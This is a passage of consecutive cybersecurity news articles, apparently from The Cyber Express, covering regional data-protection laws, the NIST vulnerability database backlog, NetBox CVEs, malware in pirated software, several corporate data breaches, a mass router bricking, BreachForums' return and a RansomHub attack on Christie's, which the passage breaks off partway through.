It continues to fortify its cyber defenses, particularly drawing on lessons learned from experiencing cyberattacks during the 2022 FIFA World Cup. 

• Qatar Cybercrime Prevention Law (2014): Criminalizes a range of cyber offenses, including hacking, phishing, and online fraud. 
• Qatar National Cybersecurity Strategy (2014): Lays out the framework for securing critical infrastructure and enhancing cybersecurity awareness. 
• Data Privacy Protection Law (2016): Focuses on personal data protection and mandates data localization requirements. 

Upcoming Developments in Qatar: 

• New Cybersecurity Strategy (2024-2030): Expected to incorporate lessons learned from hacks and intrusions during the FIFA World Cup. 

Bahrain 

Since 2018, Bahrain's Personal Data Protection Law has established guidelines for data quality control, incident response, and consumer rights. 

• Personal Data Protection Law (2018): Most similar to the GDPR among Middle-Eastern privacy laws. Data transfers are allowed to pre-approved adequate countries. 

• Key Differences from GDPR: The right to access personal data is not clearly articulated. Limited enforcement history leaves the robustness of this right uncertain. 

Turkey 

Turkey has comprehensive cybersecurity regulations to address increasing cyber threats.  

• Law on Protection of Personal Data (No. 6698): Enacted in 2016, this law closely follows GDPR principles.

• National Cybersecurity Strategy and Action Plan (2020-2023): Focuses on securing critical infrastructure, enhancing public awareness, and fostering international cooperation. 

• Regulation on Information Systems of Banks (2020): Mandates strict cybersecurity requirements for financial institutions. 

Upcoming Developments in Turkey: 

• Increased commitment to cybersecurity issues: Turkey reportedly seeks to increase its commitment to cybersecurity as part of the Development Plan for 2024–2028.

Africa

South Africa 

South Africa leads the continent in cybersecurity regulation with its progressive legislation.  

• Protection of Personal Information Act (POPIA, 2013): Enforced in 2021, this comprehensive data protection law aligns with GDPR. 

• Cybercrimes Act (2020): Consolidates and criminalizes various cyber offenses, including hacking and cyber fraud. 

Upcoming Developments in South Africa: 

• National Cybersecurity Policy Framework (NCPF): Revisions are underway to address emerging cyber threats. 

Kenya 

Kenya has taken significant steps to enhance its cybersecurity measures. 

• Data Protection Act (2019): Provides comprehensive guidelines for personal data protection and aligns with GDPR. 

• Computer Misuse and Cybercrimes Act (2018): Criminalizes cyber offenses like hacking and online fraud. 

• National ICT Policy (2019): Includes a dedicated cybersecurity strategy focusing on infrastructure security. 

Upcoming Developments in Kenya: 

• Revised Cybersecurity Strategy (2022-2027): Expected to incorporate best practices and strengthen data security. 

Nigeria 

Nigeria, Africa's largest economy, is increasingly prioritizing cybersecurity. 

• Cybercrimes (Prohibition, Prevention, etc.) Act (2015): Criminalizes cyber offenses like hacking and identity theft. 

• Nigeria Data Protection Regulation (NDPR, 2019): The primary data protection framework. 

Upcoming Developments in Nigeria: 

• Data Protection Bill (2024): Aims to replace NDPR with comprehensive legislation. 

Conclusion: 

Harmonizing regulations and laws, along with the raising of awareness among public officials, businesses and citizens across the META region is crucial for effective cybersecurity collaboration. The META region presents a unique opportunity for cybersecurity innovation. Regional collaboration can foster knowledge sharing and strengthen cyber resilience across the META landscape, as local startups develop tailored solutions. While each country adopts unique strategies tailored to its socio-economic context, there is a clear trend towards developing with global best practices like the GDPR.

The U.S. National Institute of Standards and Technology (NIST) has taken a big step to address the growing backlog of unprocessed Common Vulnerabilities and Exposures (CVEs) in the National Vulnerability Database (NVD). The institute has hired an external contractor to contribute additional processing support in its operations. The contractor hasn't been named, but NIST said it expects that the move will allow it to return to normal processing rates within the next few months.

Clearing the National Vulnerability Database Backlog

NIST is responsible for managing entries in the NVD. After being overwhelmed with the volume of entries amid a growing backlog of CVEs that have accumulated since February, the institute has awarded an external party with a contract to aid in its processing efforts. "We are confident that this additional support will allow us to return to the processing rates we maintained prior to February 2024 within the next few months," the agency stated. To further alleviate the backlog, the NIST is also working closely with CISA, the Cybersecurity and Infrastructure Security Agency, to improve its overall operations and processes. "We anticipate that this backlog will be cleared by the end of the fiscal year," the NIST stated. In its status update, NIST referenced an earlier statement the agency made that it was exploring various means to address the increasing volume of vulnerabilities through the use of modernized technology and improvements to its processes. [caption id="attachment_73938" align="alignnone" width="2332"] Source: NIST NVD Status Updates[/caption] "Our goal is to build a program that is sustainable for the long term and to support the automation of vulnerability management, security measurement and compliance," the institute said. NIST reaffirmed its commitment to maintaining and modernizing the NVD, stating, "NIST is fully committed to preserving and updating this vital national resource, which is crucial for building trust in information technology and fostering innovation."

CISA's 'Vulnrichment' Initiative

In response to the growing NVD backlog at NIST, CISA had launched its own initiative called "Vulnrichment" to help enrich the public CVE records. CISA's Vulnrichment project is designed to complement the work of the originating CNA (Common Vulnerabilities and Exposures Numbering Authority) and reduce the burden on NIST's analysts. CISA said it would use an SSVC decision tree model to categorize vulnerabilities. The agency will consider factors like exploitation status, technical impact, impact on mission-essential functions, public well-being, and whether the exploitation is automatable. CISA welcomes feedback from the IT cybersecurity community on this effort. By providing enriched CVE data, CISA aims to improve the overall quality and usefulness of the NVD for cybersecurity professionals. "For those CVEs that do not already have these fields populated by the originating CNA, CISA will populate the associated ADP container with those values when there is enough supporting evidence to do so," the agency explained. As NIST and CISA work to address the current challenges, they have pledged to keep the community informed of their progress as well as on future modernization plans. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Carrier has issued a serious product security advisory confirming the existence of several vulnerabilities in its LenelS2 NetBox access control and event monitoring platform. These vulnerabilities expose the monitoring system to potential compromise, such as remote code execution. The reported vulnerabilities are significant, as NetBox is often used to guard entries at critical facilities such as government-controlled sites and major corporations.

Multiple Vulnerabilities in Carrier's LenelS2 NetBox

Three vulnerabilities were identified in Carrier's product security advisory for NetBox. The most critical (CVE-2024-2420) of these vulnerabilities could potentially enable an attacker to circumvent authentication requirements and obtain elevated permissions, presenting a serious risk to enterprises which deploy the tool. [caption id="attachment_73894" align="alignnone" width="1478"] Source: Carrier Product Security Advisory[/caption] Successful compromise could allow an attacker to install programs, view, edit, modify data, delete data from the platform or create new user accounts with full privileges. However, this depends on the access level of accounts that had been compromised in the event of an attack. The impact of a potential attack could be lower on systems configured with low level of user access. The vulnerabilities affect all LenelS2 NetBox versions prior to 5.6.2. The identified vulnerabilities are as follows:

• CVE-2024-2420 (CVSS v3.1 Base Score 9.8, Critical): A vulnerability involving a hard-coded password in the system that could permit an attacker to bypass authentication requirements.
• CVE-2024-2421 (CVSS v3.1 Base Score 9.1, Critical): An unauthenticated remote code execution vulnerability that could permit an attacker with elevated permissions to run malicious commands
• CVE-2024-2422 (CVSS v3.1 Base Score 8.8, High): An authenticated remote code execution vulnerability that could permit an attacker to execute malicious commands.

The Center of Internet Security stated that these vulnerabilities pose higher risks to large and medium government or business entities, while posing lower risks to small businesses and individual home owners. [caption id="attachment_73896" align="alignnone" width="1128"] Source: cisecurity.org[/caption]

Vulnerability Remediation

Carrier has attempted to address these vulnerabilities in its latest release of NetBox version 5.6.2. Carrier has advised customers to immediately upgrade to the latest release version by reaching out to their authorized NetBox installer. As mitigation, Carrier also advised customers to follow the recommended deployment guidelines, which are detailed in its NetBox hardening guide accessible through NetBox's built-in help menu. The Center of Internet Security has advised customers to take additional measures such as applying appropriate updates to NetBox systems, applying the principle of least privilege to user accounts, rigorous scanning of vulnerabilities and isolating critical systems, functions, or resources. The lack of basic security safeguards along with poor code practices such as the presence of hard-coded authentication tokens and improper input sanitization raises concerns about the usage of NetBox to guard physical access to important business and government areas or critical infrastructure. While there are no confirmed reports of the NetBox vulnerabilities being exploited in the wild, the severity of these vulnerabilities mark them as an important security consideration as countless organizations could be at risk of devastating attacks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

South Korean researchers have observed the malicious use of pirated copies and cracked activators of legitimate productivity and office utility programs such as Hangul Word Processor and Microsoft Office to disguise malicious programs. The malware maintains persistence by scheduling regular upgrades on affected systems, leading to consistent installation of newer strains of the malware multiple times every week.

Malicious Pirated Copies of Microsoft Office and Other Programs

Researchers from AhnLab discovered that attackers have been creating and distributing malicious copies of popular utility software. These copies were distributed through common file-sharing platforms and torrent websites. The operation takes advantage of users looking to obtain free copies of software without paying the required license fee. When downloaded and executed, the programs usually appear as convincing cracked installers or activators for programs such as Microsoft Office or the Hangul word processor. While the initial downloader was developed in .NET, the attackers appear to have moved to more obfuscated attack techniques. The malware retrieves its instructions for the next stage of its attack from Telegram or Mastodon channels operated by the attackers. These channels contain encrypted Base64 strings that lead to Google Drive or GitHub URLs that host the malicious payloads. These malicious payloads are downloaded and decrypted through the use of the legitimate 7-zip archive utility that is commonly present on systems and operates with low footprint. Researchers discovered that the decrypted payloads contained PowerShell instructions to load and execute additional malware components on the victim's system. The malware strains loaded on the infected systems include:

• OrcusRAT: A remote access trojan with extensive capabilities like keylogging, webcam access, and remote screen control.
• XMRig Cryptominer: Configured to stop mining when resource-intensive apps are running to avoid detection. Also kills competing miners and security products.
• 3Proxy: Injects itself into legitimate processes to open a backdoor proxy server.
• PureCrypter: Fetches and runs additional malicious payloads from attacker-controlled servers.
• AntiAV: Disrupts security products by repeatedly modifying their configuration files.

The commands include an updater that contains instructions to maintain persistence over the system through the use of the native Windows Task Scheduler present on the Windows operating system. C&C server addresses shared by the researchers also indicate that they have been disguised as a minecraft rpg server.

Continuous Reinfection and Distribution

The researchers said systems may remain infected even after the initial infection has been removed, due to the malware's ability to update itself as well as download additional malware payloads. They stated that the attackers had distributed new malware on affected systems multiple times each week to bypass file detection. The researchers said the number of systems that had been compromised in these attacks continued to increase as the registered task scheduler entries loaded additional malicious components on affected systems despite the removal of previous underlying malware. The researchers advised South Korean users to download software and programs from their official sources rather than file-sharing sites. Users who suspect that their systems may already have been infected should remove associated task scheduler entries to block the download of additional malware components, and update their antivirus software to the latest available versions. The researchers have additionally shared indicators of compromise, categories that have been detected as flagged in the attack, MD5 hashes of files used in the attack, associated C&C server addresses, and suspicious behaviors that have been observed during the attack. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Toshiba America Business Solutions reached out to customers to inform them of a potential data security incident in which their personal information may have been compromised. Toshiba America Business Solutions is an American subsidiary of the Toshiba TEC Corporation. The company said that it was committed to protecting the confidentiality and security of personal data, and offered credit monitoring services to affected individuals.

Toshiba America Data Breach

After conducting a preliminary investigation, Toshiba reported that an attacker may have compromised its email environment. The attacker may have obtained unauthorized access to sensitive personally identifiable information such as names and Social Security numbers from the email compromise. The investigation confirmed that the breach could have impacted numerous individuals, leading Toshiba to contact affected individuals, as legally required. Toshiba America Business Solutions advised customers to remain cautious over the incident. The firm advised customers to regularly review their credit reports, financial account statements, and payment card statements for any unauthorized activity. Any suspicious activity could be reported to Toshiba or law enforcement agencies. Toshiba apologized to the affected individuals for any inconvenience stemming from the incident and said that additional measures had been implemented since then to enhance the security of its email environment and prevent similar occurrences in the future. To assist the affected individuals in safeguarding their personal information, Toshiba has arranged for a complimentary, two-year membership of identity monitoring services offered through Kroll. This membership offering includes triple bureau credit monitoring, fraud consultation, and identity theft restoration. The fraud consultation option allows affected individuals  to reach out to Kroll fraud specialists for advice and assistance relating to identity protection, legal rights, and detection of suspicious activity. The identity theft restoration option lets affected individuals work with a licensed Kroll investigator to resolve potential identity theft issues. Toshiba stated that these services would be provided for free to the affected individuals and would not negatively impact their credit scores. Affected individuals were encouraged to use the services as well as to contact Toshiba or Kroll for additional assistance.

Law Firm Announces Investigation

Strauss Borrelli PLLC, a data breach law firm, announced on its website that it would be investigating Toshiba American Business Solutions, Inc. with regard to the recent data breach that exposed sensitive personally identifiable information. While the full extent of the data breach is unknown, the Toshiba America Business Solutions division operates offices across the U.S. and Latin America. The law firm encouraged customers who received a breach notification letter from Toshiba American Business Solutions to contact Strauss Borrelli PLLC to discuss their rights and potential legal remedies in response to the incident. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

In one of the largest mass bricking events in history, at least 600,000 routers belonging to subscribers of the same ISP service were essentially destroyed last October. The incident has been dubbed "Pumpkin Eclipse," with researchers still unclear on how the routers became infected. The affected devices displayed a steady red light and were unresponsive to troubleshooting attempts, and had to be replaced. Now new research is shedding light on the attack, which involved unusually sophisticated and stealthy attack methods.

'Pumpkin Eclipse' Router Attack

The attack began on October 25, 2023, as the ISP's subscribers began reporting their ActionTec T3200 and Sagemcom routers had suddenly stopped working. Users described the devices as unresponsive, with a steady red light on the front panel. Many blamed the ISP for the mass "bricking" of the routers, alleging the company had pushed faulty firmware updates. However, according to new research by Black Lotus Labs, the incident was in fact the result of a deliberate, malicious act. The researchers reported that over a 72-hour period, a malware known as "Chalubo" had infected over 600,000 routers connected to a single autonomous system number (ASN) belonging to an unnamed ISP. While the researchers avoided naming the ISP affected in the attack, the description of the attack matches frustrations expressed months ago by subscribers of the Windstream ISP, such as the router affected and its resulting behavior. The Chalubo malware, a commodity remote access trojan (RAT) first identified in 2018, employed sophisticated tactics to cover its tracks. It removed all files from the infected devices' disks, ran entirely in memory, and assumed random process names already present on the routers. The researchers believe the malware downloaded and ran code that permanently overwrote the router's default device firmware, rendering them permanently inoperable. The researchers state that while the motives behind the attack are unknown, its implications are troubling.

Researchers Unsure Over Initial Attack Vector but Theorize Possibilities

Although the researchers identified the malware's multi-chain attack process and its spread across the ISP's network, they have been unable to determine the initial infection vector employed by the threat actor. They theorize that it could have possibly resulted from the exploit of an inherent vulnerability, exploit of weak credentials, or compromise of the routers' administrative panels. The researchers said the attack is highly concerning, as it represents a new precedent for malware capable of mass-bricking consumer networking devices. The researchers could only recall one prior similar event - the 2022 discovery of the AcidRain malware, which knocked out over 10,000 satellite internet modems in Ukraine and Europe during the start of the Russian invasion. The researchers said the impact of "Pumpkin Eclipse" attack was particularly severe, as the affected ISP's service area covers many rural and underserved communities. Residents may have lost access to emergency services, farmers could have been cut off from remote crop monitoring, and healthcare providers may have been unable to access patient records or provide telehealth services. "At this time, we do not assess this to be the work of a nation-state or state-sponsored entity," the Lumen researchers wrote. In fact, we have not observed any overlap with known destructive activity clusters; particularly those prone to destructive events such as Volt Typhoon, or SeaShell Blizzard. Nonetheless, they speculated that usage of a commodity malware family may have been a deliberate move to obscure the perpetrator's potential identity. Recovery from such a supply chain disruption is always more challenging in isolated or vulnerable regions, the researchers added. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Pharmaceutical giant Johnson & Johnson recently announced a data breach that may stem from a larger data breach affecting Lash Group, a division of Cencora. In February, Cencora reported a data breach incident to the U.S. Securities and Exchange Commission (SEC) after learning that data had been exfiltrated from its information systems, some of which contained personal information. The breach may have compromised some sensitive information of patients registered with Johnson & Johnson Patient Assistance Foundation, Inc.

Johnson & Johnson Data Breach Notice

On May 29, Johnson & Johnson filed a notice of data breach with the Attorney General of Texas, indicating that an unauthorized party accessed confidential patient information. The breach affected approximately 175,000 Texans, but the total number of victims nationwide could be much higher. The breach affects two Johnson & Johnson entities: Johnson & Johnson Patient Assistance Foundation, Inc., and Johnson & Johnson Services, Inc. The following data was compromised in the attack: Name of individual, Address, Medical Information, and Date of Birth. Data breach notification letters have been sent to all the affected individuals, while limited information is available on the Texas Attorney General's data breach reports page. The incident is potentially linked to a much larger breach involving Cencora, which has affected over a dozen major pharmaceutical companies so far.

Link to Cencora Data Breach

The Johnson & Johnson data breach bears several similarities to other large third-party pharmaceutical company data breaches affected by the Cencora/Lash Group data breach, which was first discovered on February 21. Cencora’s Lash Group division aids pharmaceutical companies in running patient support programs that try to ensure that costly medication is available to disadvantaged patients, regardless of their ability to pay for them. At least 15 clients of Cencora/Lash Group have notified state authorities of data breach incidents, with databreaches.net listing the following victims:

• AbbVie: 54,344 Texans affected
• Acadia Pharmaceuticals: 753 Texans affected
• Bayer: 8,822 Texans affected
• Bristol Myers Squibb and/or the Bristol Myers Squibb Patient Assistance Foundation: 256,237 Texans and 11,503 New Hampshire residents affected
• Dendreon: 2,923 Texans affected
• Endo: no numbers provided
• Genentech: 5,805 Texans affected
• GlaxoSmithKline Group of Companies and/or the GlaxoSmithKline Patient Access Programs Foundation: no numbers provided
• Incyte Corporation: 2,592 Texans affected
• Marathon Pharmaceuticals, LLC/PTC Therapeutics, Inc.: 466 Texans and 27 New Hampshire residents affected
• Novartis Pharmaceuticals: 12,134 Texans affected
• Pharming Healthcare, Inc.: 314 Texans and 9 New Hampshire residents affected
• Regeneron Pharmaceuticals: 91,514 Texans affected
• Sumitomo Pharma America, Inc.: 24,102 Texans affected
• Tolmar: 1 New Hampshire resident

Data breach notices have also been filed with California officials too. While the full extent of the damage has yet to be determined, it has affected over 540,000 patients so far. Cencora stated in its notification to the Securities and Exchange Commission that it had not yet been able to determine if the incident had a material impact on its operations. In in a notice on its website, the Leash Group indicated that personal information as well as personal health information had been potentially affected, including first name, last name, date of birth, health diagnosis, and/or medications and prescriptions. The Leash Group said in a statement that no personal data appears to have been exposed because of the incident:

“There is no evidence that any of this information has been or will be publicly disclosed, or that any information was or will be misused for fraudulent purposes as a result of this incident, but we are communicating this so that affected individuals can take the steps outlined below to protect yourself.”

The Leash Group is offering free credit monitoring and remediation services to affected individuals, and additional guidance on dealing with suspected breaches of personal information. No perpetrator has been identified or named as being responsible for the attack, and the potential impact of the breach is still being assessed. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Following the seizure of the BreachForums domain and the arrest of Baphomet, its new owner ShinyHunters seems to have fully regained control over the site after a recent announcement that the forum will be open for account registration. While the domain itself appeared to have been seized back from law enforcement, the site remained dysfunctional for a while as staff redirected visitors to a new Telegram channel. The site slowly resumed operations while initially disabling account registration. However, the arrests and law enforcement activity connected to the operation of the domain, as well as its quick return to operations, have led cybercriminals to fear possible compromise of the forum infrastructure by law enforcement.

BreachForums Seizure and Return

BreachForums, widely recognized as the successor to RaidForums, has faced several downtimes, seizures and disruptions in its eventful history. The original owner, Conor Brian Fitzpatrick AKA "Pompompurin," was arrested last year on cybercrime and device fraud charges. BreachForums administrator "Baphomet" announced that he would step in as successor and opened a new domain to resume forum activity. However, Baphomet himself feared site compromise by law enforcement and temporarily shut down the forums, expressing that "nothing is safe anymore." [caption id="attachment_72568" align="alignnone" width="1536"] Source: Cyble[/caption] However, Baphomet later announced that he would be working on a new domain and resuming forum operations. The forum soon returned with regular facilitation of data leak sharing and discussion. A year later, Baphomet himself faced arrest after a joint operation from law enforcement, which also seized the BreachForums domain and official Telegram channel. The administrator ShinyHunters emerged as the successor, confirming Baphomet's arrest. However, the domain seizure was short-lived, and was soon redirecting users to a new Telegram channel. An allegedly leaked conversation from an FBI operative to BreachForum's previous domain name registrar and hosting provider NiceNic also appeared to indicate that ShinyHunters had regained control over domain ownership despite its court-ordered seizure. [caption id="attachment_72579" align="alignnone" width="326"] Source: Telegram[/caption] After a period of dysfunction, BreachForums has now resumed operations, with threat actors already claiming new victims on its forum postings.

Emerging Alternatives and Criminal Suspicion Over BreachForums

In the wake of the recent seizure, several other individuals expressed their doubts over BreachForums and its possible usage as a "honeypot" by law enforcement to entrap cybercriminals and disrupt operations. The owner of Secretforums and former owner of Blackforums expressed his belief over Telegram that Baphomet was possibly an informant to law enforcement, citing the latter's interest in maintaining the infrastructure of Blackforums. Prominent threat actor USDoD also cast doubt over the succession of BreachForums to the administrator Shiny Hunters, citing his low stats on the previous domain. These concerns were followed by the self-promotion of SecretForum's and USDoD's announced project "Breach Nation" as possible alternatives. More recently, the CyberNi***rs threat actor group also announced its intention to start a new site to coordinate its operations. Despite these activities and the surrounding suspicion, new owner Shiny Hunters seems eager to return to earlier activities and operations, as judged by their claim of responsibility for an attack impacting Live Nation Entertainment Inc., the parent company of Ticketmaster. The results of these events, their effect on the cybercriminal ecosystem, as well as the viability of emerging forums as alternatives to the relaunched BreachForums led by ShinyHunters, remain unclear. But given how vocal the participants are, the picture will almost certainly get clearer with time. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Fans of Bring Me The Horizon have been fervently searching for secrets and clues hidden within an 'M8 Artificial Reality game' subtly teased in a recent music video by the band. Near the video's conclusion, a character emerges, briefly greets viewers, and then abruptly instructs them to search for a specific code. Although the discovery of the hidden game thrilled many, excitement was momentarily dampened when the game's website was swapped out for a warning urging visitors not to hack into the system.

Bring Me The Horizon Hidden M8 Artificial Reality Game

Bring Me the Horizon, a British rock band formed in Sheffield in 2004, is celebrated for embedding hidden meanings, easter eggs, and clues in their music. With the release of their latest album, 'POST HUMAN: NeX GEn,' the band has notably deepened this practice, incorporating even more intricate layers of secrets into their songs. In one of the music videos from this album, a character named 'M8' appears and begins to greet the viewer but is abruptly stopped by a 'fatal-error'. M8 then directs the viewer to find the 'serial number' located on the side of its head. A curious listener appeared to have further analyzed the video segment in the video and discovered a hidden spectrogram containing a QR Code, sharing an image file on the rock band's subreddit. Fans further discovered that the QR code led to the URL domain of a hidden clandestine hacking-themed website, containing the M8 Artificial Reality Game. [caption id="attachment_72429" align="alignnone" width="233"] Source: /r/BringMeTheHorizon subreddit[/caption] The M8 Artificial Reality domain then instructed users to enter a hidden serial code, which fans discovered through the use of several other clues. The site contained unreleased tracks, password-protected files, and various mysteries for fans to uncover. [caption id="attachment_72432" align="alignnone" width="2800"] Source: multidimensionalnavigator8.help[/caption] As news of the hidden website spread, fans swiftly set up a dedicated Discord server and collaborated using a Google Doc to unearth all the site’s secrets. However, their excitement was brief. Hackers soon tried to extract further secrets from the website using unconventional methods, leading developers to temporarily shut down the site and issue a warning to fans.

Warnings Over Hacking Attempts

After the hacking attempts, cautionary messages from M8, the album's virtual guide, expressed dismay at the intrusion, stressing on how such actions undermined the spirit of collective exploration. These messages were delivered through both the website which was temporarily replaced with the warning for 2 hours as well as through email. [caption id="attachment_72445" align="alignnone" width="2800"] Source: archive.org[/caption] [caption id="attachment_72448" align="alignnone" width="276"] Source: BringMeTheHorizon ARG Discord[/caption] The developers appeared to indirectly condemn these attempts through the creative  use of the M8 character, without specifying the nature of the intrusion or identifying the perpetrators. Some fans however, upon receiving the email after their explorations, found the message warnings unexpected for what they believed were legitimate interactions. The community believed that these selective few hackers ruined the experience for others, with it's discord server noting the downtime in it's FAQ. 0 Bring Me The Horizon's foray into alternate reality gaming showcases the creative potential of digital media in music and album promotion. As fans continue to work together to unravel the remaining mysteries and solve the puzzles within the ARG, it remains to be seen what other surprises await them on the hidden website. The hacking attempts and the subsequent warnings serves as a reminder that while ARGs can be an engaging and immersive experience, it is essential to respect the developers' intentions and play fair to ensure everyone can enjoy the journey together. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Strauss Borrelli PLLC, a leading law firm known for handling data breach litigation, has launched an investigation into the recent WD & Associates data breach. WDA, based in Rhode Island, is an employee benefits brokerage firm specializing in healthcare consulting. The company assists clients in making well-informed decisions about financial planning and employee benefits. The incident may have exposed sensitive personally identifiable information and protected health information for an undetermined number of patients and other affected individuals.

WD & Associates Data Breach

WD & Associates provide a wide range of services including Employee Benefits, Safe Money Management, HR Consulting, Retirement Planning, IRA Rollovers, Actuarial Consulting, Risk Management, Business Consulting, Organizational Development. However, information from these services may be potentially compromised after a recent data breach. The security incident occurred between February 1 and February 9, 2023, when an unauthorized actor accessed sensitive information stored on WDA systems. WD stated that it had taken immediate action to secure its network and launched an investigation to determine the nature and scope of the breach. WDA began notifying potentially impacted individuals of the incident on May 24, 2024. The potentially exposed information includes:

• Name
• Social Security number
• Date of birth
• Driver’s license number
• Passport number
• Financial account information
• Medical information
• Health insurance information

WD is offering 24 months of complimentary credit monitoring services through Experian to enrolled individuals. The company also stated that it would implement additional cybersecurity tools and review existing policies and procedures to prevent similar incidents from occurring in the future. WD also stated that it had notified details about the investigation to relevant federal law enforcement and would notify relevant regulators, as legally required.

Strauss Borrelli PLLC Investigation Into Data Breach

The Strauss Borrelli PPLC Law firm announced on it's site that it would be interested in discussing further rights and potential legal remedies with the individuals who received the recent data breach notification letter from WD & Associates, Inc. Individuals can contact the law firm through their number 872.263.1100 or e-mail address sam@straussborrelli.com. Individuals should also remain vigilant against identity theft and fraud by regularly reviewing account statements, explanation of benefits, and monitoring free credit reports for suspicious activity. Additionally, U.S. consumers are legally entitled to one free credit report annually from each of the three major credit reporting bureaus(Equifax, Experian, and TransUnion). To request a free credit report, visit www.annualcreditreport.com or call 1-877-322-8228. Consumers also have the option to place a fraud alert or implement credit freeze on their credit file at no cost. Suspicious activity should be reported promptly to relevant parties, including insurance companies, healthcare providers, and financial institutions. WD & Associates affirmed its commitment to protecting the privacy and security of its clients' information and that the company would continue to provide updates and further information as soon as they become available. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Check Point researchers have observed a surge in threat actor groups targeting remote-access VPN environments as an entry point for gaining access to enterprise networks. In response to these threats, Check Point has been monitoring unauthorized access attempts on Check Point VPNs and has released a preventative solution to address the issue. While the researchers suggested that the issue is broader than Check Point VPNs, the fix applies solely to Check Point environments.

Identification of Unauthorized Access Attempts to Check Point VPN

On May 24, Check Point identified a small number of login attempts using old VPN local accounts that relied on an unrecommended password-only authentication method. The company assembled special teams of Incident Response, Research, Technical Services, and Products professionals to thoroughly investigate these attempts and any other potentially related incidents. Within 24 hours, the teams identified several potential customers who were subject to similar attempts and notified them accordingly. The teams consider password-only authentication methods insecure and more susceptible to the compromise of network infrastructure, recommending against solely relying on these methods when logging into network infrastructure. Several points were advised by the teams as preventative measures, such as:

• Reviewing and disabling unused local accounts.
• Implementing an additional layer of authentication, such as certificates, to password-only accounts.
• Deploying additional solutions on Security Gateways to automatically block unauthorized access.
• Contacting the Check Point technical support team or a local representative for additional guidance and assistance.

In case of suspected unauthorized access attempts, Check Point researchers recommend that organizations analyze all remote access connections of local accounts with password-only authentication, monitor connection logs from the past 3 months, and verify the familiarity of user details, time, source IP address, client name, OS name, and application based on configured users and business needs. Check Point has also released a hotfix to prevent users with password-only authentication from connecting to Security Gateways. After implementation, password-only authentication methods for local accounts will be prevented from logging into the Check Point Remote Access VPN. If any connections or users are not validated, invoking the incident response playbook or contacting Check Point Support or a local Check Point representative is advised. The company stated that it witnessed the compromise of several VPN solutions, including those of various cybersecurity vendors.

Implementing Check Point VPN Hotfix

Check Point released a script to identify potential risks of compromise in its VPN environment. Enterprises can download the VPNcheck_v2.zip archive file and follow the steps mentioned on the solution page. If the script identifies local accounts with password-only authentication, users can proceed with the installation of the Security Gateway Hotfix as an option. The hotfix is available via the Check Point Upgrade Service Engine (CPUSE) or through manual download. The Hotfix implements a new command, blockSFAInternalUsers, to the Security Gateway, allowing admins to block or grant access to internal users with password-only authentication. The default value is set to block internal users from connecting with password-only authentication. After installing the hotfix, users who attempt to connect using the weak password-only authentication method will receive a security log indicating the blocked attempt as failed. As remote operations and online threats rise, organizations must prioritize the implementation of tougher VPN authentication methods while monitoring for unauthorized attempts to access these environments. Failure to do so can lead to compromised network infrastructure or assets, data breaches, and significant financial and reputational damage. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The notorious ransomware gang RansomHub has claimed responsibility for a recent cyberattack on Christie's auction house, disrupting its website just days before its marquee spring sales and leaking data to back up its claims. The group posted a message on its dark web leak site claiming to have gained access to compromised information about the world's wealthiest art collectors. Christie's officials downplayed the seriousness of the breach, however, and said that no financial or transactional data was compromised in the attack.

RansomHub Claims Cyberattack on Christie's Auction House

The attack, which occurred two weeks ago, had brought down Christie's official website, forcing the auction firm to switch to methods such as an alternative domain to reach potential buyers and sellers ahead of its highly anticipated spring sales after the company announced it would proceed with the sales despite setbacks. The sales were scheduled to occur at multiple locations such as New York and Geneva, and estimated to fetch 850 million dollars from buyers. The RansomHub ransomware gang has now claimed responsibility for the attack on its leak site, stating that it had compromised about 2GB of data from the the auction giant during the initial network compromise. The details were said to include BirthPlace, MRZFull, DocumentNumber, BirthDate, ExpiryDate, FirstName, LastName, IssueDate, IssuingAuthority, DocumentCategory, DocumentType and NationalityName. [caption id="attachment_71548" align="alignnone" width="751"] Source: X.com (@AlvieriD)[/caption] The threat actor group said they had attempted to come to a "reasonable solution," but that Christie's had ceased communications midway and failed to pay the demanded ransom. The threat group shared an alleged sample of the stolen data. [caption id="attachment_71550" align="alignnone" width="725"] Source: X.com (@AlvieriD)[/caption] The hackers warned that Christie's would face heavy fines under the EU's General Data Protection Regulation (GDPR) and face reputation damage among its clients. The General Data Protection Regulation (GDPR) mandates that EU companies disclose security incidents that compromise client data, with non-compliance potentially leading to fines up to $22 million. Cybersecurity experts describe RansomHub as a powerful ransomware group with possible ties to ALPHV, a network of Russian-speaking extortionists.

Christie's Auction House Downplays Data Leak

